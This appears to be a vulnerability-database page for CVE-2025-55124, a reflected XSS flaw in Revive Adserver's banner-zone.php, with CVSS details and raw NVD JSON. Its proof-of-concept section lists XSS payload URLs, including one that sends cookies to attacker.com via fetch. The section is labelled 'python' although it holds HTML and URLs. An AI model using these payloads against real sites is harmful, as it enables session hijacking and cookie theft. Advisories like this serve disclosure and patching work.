Security Vulnerability Report
中文
CVE-2025-55124 CVSS 6.1 MEDIUM

CVE-2025-55124

Published: 2025-11-20 20:16:24
Last Modified: 2025-11-26 16:56:10

Description

Improper neutralisation of input in Revive Adserver 6.0.0+ causes a reflected XSS attack in the banner-zone.php script.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* - VULNERABLE
Revive Adserver 6.0.0+

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-55124 Reflected XSS PoC --> <!-- Target: Revive Adserver banner-zone.php --> <!-- Basic XSS Payload --> https://[target]/banner-zone.php?zoneid=<script>alert(document.cookie)</script> <!-- Event Handler XSS Payload --> https://[target]/banner-zone.php?zoneid=<img src=x onerror=alert('XSS')> <!-- Cookie Theft Payload --> https://[target]/banner-zone.php?zoneid=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script> <!-- More Obfuscated Payload --> https://[target]/banner-zone.php?zoneid=<svg/onload=alert(document.domain)>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55124", "sourceIdentifier": "[email protected]", "published": "2025-11-20T20:16:23.677", "lastModified": "2025-11-26T16:56:10.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper neutralisation of input in Revive Adserver 6.0.0+ causes a reflected XSS attack in the banner-zone.php script."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndIncluding": "6.0.1", "matchCriteriaId": "42E4B7BD-5F7B-4FBE-93D2-C19F30FA5A51"}]}]}], "references": [{"url": "https://hackerone.com/reports/3403727", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://hackerone.com/reports/3403727", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}